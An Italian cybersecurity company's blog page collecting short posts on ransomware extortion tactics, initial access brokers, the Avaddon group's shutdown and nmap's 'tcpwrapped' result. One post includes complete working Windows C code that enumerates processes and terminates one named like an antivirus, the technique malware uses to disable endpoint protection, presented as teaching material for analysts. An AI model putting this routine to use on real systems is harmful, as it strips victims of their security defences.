Pillole
Visite: 4699

Il Ransomware è il malware che si è maggiormente evoluto nel tempo. Partendo da un software in grado di criptare file su disco e di richiedere un riscatto per l’ottenimento delle chiavi di decrittazione è diventato una minaccia sempre più pericolosa.

Il gruppo criminale dietro il ransomware Clop è stato il primo a portare l’estorsione ad un livello superiore. Questo gruppo infatti, prima di criptare i file li esfiltrano presso il proprio C2, minacciando così la vittima di divulgarli sul web.

Questo naturalmente aggiunge pressione alla vittima che, anche se avesse custodito diligentemente i backup dei file criptati vedrebbe divulgate su internet informazioni riservate.

Nella loro continua evoluzione i Ransomware hanno inserito un altro livello di estorsione, infatti gli autori del Ransomware Avaddon, per la prima volta hanno minacciato colpire la vittima con un micidiale attacco DDos se non avesse pagato il riscatto.

E siamo così arrivati al terzo livello.

Il quarto è stato raggiunto nuovamente dal gruppo Clop che oltre a criptare i file, minacciare di diffonderli in rete e attaccare la vittima con un micidiale DDos, invia email a tutti i clienti del malcapitato informandoli di avere informazioni confidenziali sul loro conto che verranno diffuse qualora la vittima non dovesse pagare il riscatto.

Potete immaginare la pressione esercitata sulla vittima in seguito ad un’azione di questo tipo.

Il modello estorsivo è continuamente in evoluzione al punto che alcuni gruppi, se si accorgono di aver in mano segreti industriali, provano a venderli ai competitor, inviandogli un’email con un saggio delle informazioni che verrebbero ad avere se dovessero accettare.

Immaginate se un Ransomware colpisse la Ferrari ed inviasse di dati sulla nuovissima e rivoluzionaria macchina ai loro competitor!

Questa minaccia è talmente temuta che il mese scorso, dopo l'attacco a Colonial Pipeline, il Presidente degli Stati Uniti ha dichiarato che la minaccia Ransomware verrà trattata alla stregua della minaccia terroristica creando così una task force ad hoc per il suo contrasto.

Pillole
Visite: 5064

Una recente ricerca riporta che i gruppi criminali dietri i principali attacchi ransomware hanno modificato la tecnica utilizzata per l'accesso iniziale alle reti vittime.
In pratica al posto di utilizzare il phishing oppure lo sfruttamento di una vulnerabilità, hanno iniziato a comprare gli accessi venduti da Initial Access Brocker ovvero altri gruppi criminali specializzati nell'initial foothold. Il prezzo pagato è generalmente una fetta del bottino.
Questi intial access broker sono estremamente specializzati e riescono ad infiltrarsi nelle infrastrutture delle vittime tramite malware come The Trick, Drides, Qbot, BasarLoader o IceId.
Naturalmente questo conferma come i gruppi criminali stiano sempre più lavorando in partnership sviluppando competenze estremamente specifiche la cui interazione porta poi agli attacchi che conosciamo come quelli a Colonial Pipeline, JBS o CNA Hardy

Pillole
Visite: 11569

Una delle caratteristiche dei malware è la capacità di individuare e disattivare sistemi di end point detection o antivirus.
Ma come possono eseguire queste operazioni?
Parlando di processi che operano in ambiente windows è necessario che il software malevolo sia in grado di creare uno snapshot della memoria, ciclare su tutti i processi ivi presenti, individuare il processo da disattivare ed infine disattivarlo.
Le primitive che dobbiamo andare a utilizzare durante un’analisi sono:


CreateToolHelp32Snapshot: esegue uno snapshot della memoria e restituisce un handler che chiamiamo hProcessSnap
Process32First e Process32Next: che sono in grado di identificare i processi attivi nello snapshot e richiamate all’interno di un ciclo ci permettono di ricercare il processo con il nome che noi vogliamo es. Antivirus.exe
• Una volta identificato il processo acquisisco il suo handler con diritti PROCESS_TERMINATE
• Lo termino con TerminateProcess


Naturalmente il malware deve ottenere i diritti amministrativi necessari per eseguire quest’azione
Nel codice seguente eseguo quest’azione ricercando un processo ipotetico chiamato Antivirus.exe :
int main(void)
{
HANDLE hProcessSnap;
HANDLE hProcess;
PROCESSENTRY32 pe32;
int trovato = 0;
WCHAR nome[] = L"Antivirus";

// faccio lo snapshot dei processi di sistema
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hProcessSnap == INVALID_HANDLE_VALUE)
{
printf("CreateToolhelp32Snapshot (of processes)");
return(FALSE);
}

// definisco la dimensione della struttura pe32 utilizzata nel ciclo
pe32.dwSize = sizeof(PROCESSENTRY32);

// Prendo le info del primo processo
if (!Process32First(hProcessSnap, &pe32))
{
printf("Errore in Process32First");
CloseHandle(hProcessSnap);
return(FALSE);
}
//Ora ciclo tra tutti i processi nello snapshot
do
{


if (wcsstr(pe32.szExeFile,nome) > 0) { //cerco se il nome del processo contiene la stringa di ricerca


wprintf(L"Termino %s \n", pe32.szExeFile); // scrivo che sto terminando il processo
HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, 0, (DWORD) pe32.th32ProcessID); //acquisisco l'handle con i diritti corretti
TerminateProcess(hProcess, 9); // termino il processo
trovato = 1;}


} while (Process32Next(hProcessSnap, &pe32) && !trovato); //continuo con il prox processo nello snapshot
CloseHandle(hProcessSnap);
return(TRUE);
}

Pillole
Visite: 5483
A quanto pare il gruppo dietro il famosissimo Ransomware Avaddon ha chiuso i battenti.
Questa notizia viene confermata dal fatto tutti i loro siti TOR sono diventati inaccessibili e che Bleeping Computers ha ricevuto una email anonima con tutte le chiavi di decrittazione perfettamente elencate per vittima del ransomware in questione.
Non si capisce il motivo di questa uscita frettolosa dalla scena, i loro colleghi di Grand Crab fecero qualcosa di molto più eclatante, ma pare che possa essere dovuta alla crescente pressione messa dal governo americano nel confronto di questo tipo di criminali.
Come sapete, infatti, dopo l'attacco a Colonial Pipeline, il direttore dell'FBI Christopher A. Wray ha dichiarato che gli attacchi ransomware rappresentano per gli Stati Uniti d'America il nuovo 9/11, dichiarando così che verranno aumentate considerevolmente le risorse economiche impegate per contrastare questa minaccia.
Come vi ho già raccontato in un'altra pillola, il gruppo dietro Avaddon è stato il primo a minacciare le vittime di attacchi Ddos se non avessero pagato il riscatto, naturalmente oltre alla pubblicazione on line di tutti i dati sottratti. Con loro quindi si è alzato il livello di estorsione da "double extorsion" a "triple extorsion":

  1. Non ti do le chiavi di decrittazione
  2. Pubblico tutti i tuoi dati sensibili on line
  3. Ti becchi pure un bell'attacco Ddos!

Pillole
Visite: 7981

Pillole di #penetrationtest

Se nmap ci indica una porta "tcpwrapped", si tratta di un probabile rilevamento del servizio TCPWrappers Unix.

Usiamo al solito il condizionale, in quanto molte delle ricerche nmap "deducono" qualcosa dalle risposte ottenute. Ma se questo è vero, lo stato della porta è più articolato che essere semplicemente aperta, chiusa o filtrata.

TCP Wrappers è un super-servizio ("super-listener") in uso nei sistemi Unix (su Linux fino all'ingresso nella scena di systemd, che ne prende il ruolo) capace di intercettare la richiesta di apertura socket per qualsivoglia porta per dirottarla poi verso un processo capace di gestire il protocollo presunto (in realtà è il programma che si registra per avere questa redirezione, quindi il legame porta-programma è definito in origine).

Naturalmente TCP Wrappers ha capacità di ACL (a difesa di programmi e non di porte) che consentono di limitare gli accessi secondo alcune condizioni, quindi può chiudere la porta ... SLAM !

Per nmap questa porta può anche essere considerata "aperta" (quando nessuna risposta negativa è giunta, in mancanza di ACL), ma può anche essere che il programma "backend" non sia operativo (o non ci sia affatto) e questo confonde le idee. Può inoltre trovarsi con un diniego da parte di TCP Wrappers e quindi il tutto si complica ancora di più.

E' naturale che tutto questo dipende fortemente dal tipo di analisi che è stata condotta (parametri nmap), dagli elementi in gioco (ip, porte, ecc) e tutto quanto sia correlato alle modalità di intervento di TCP Wrappers.

Questo discorso vale se la porta rilevata è una sola ... altrimenti potremmo essere di fronte ad un altro fenomeno.

nmap si lascia anche confondere.... non è perfetto: magari siamo di fronte ad uno strumento di sicurezza che tenta di ingannare i software di scansione ... ma questo è un altro discorso.

  1. Top Ten Owasp: Cross Site Scripting
  2. Top Ten Owasp: Security Misconfiguration
  3. Facefish: un information stealer operante su sistemi linux
  4. Agent Tesla

Cyber Security UP

CybersecurityUP è una BU di Fata Informatica.
Dal 1994 eroghiamo servizi di sicurezza IT per grandi organizzazioni sia civili che militari.
Image
Image
Image
Via Tiburtina 912,
CAP 00156,
ROMA

Lunedì-venerdì
09:00 - 13:00
14:00 - 18:00

+39 06 4080 0490
amministrazione@fatainformatica.com

Contattaci

Necessiti dei nostri servizi di Cybersecurity?

Privacy policy

Ti invitiamo prendere visione della nostra
privacy policy  per la protezione dei tuoi dati personali.
Disclaimer
Alcune delle foto presenti su Cybersecurityup.it potrebbero essere state prese da Internet e quindi valutate di pubblico dominio. Se i soggetti o gli autori avessero qualcosa in contrario alla pubblicazione, lo possono segnalare via email alla redazione che provvederà prontamente alla rimozione delle immagini utilizzate.
© 2025 Fata Informatica. Tutti i diritti riservati.
We use cookies

Utilizziamo i cookie sul nostro sito Web. Alcuni di essi sono essenziali per il funzionamento del sito, mentre altri ci aiutano a migliorare questo sito e l'esperienza dell'utente (cookie di tracciamento). Puoi decidere tu stesso se consentire o meno i cookie. Ti preghiamo di notare che se li rifiuti, potresti non essere in grado di utilizzare tutte le funzionalità del sito.

Ok Rifiuta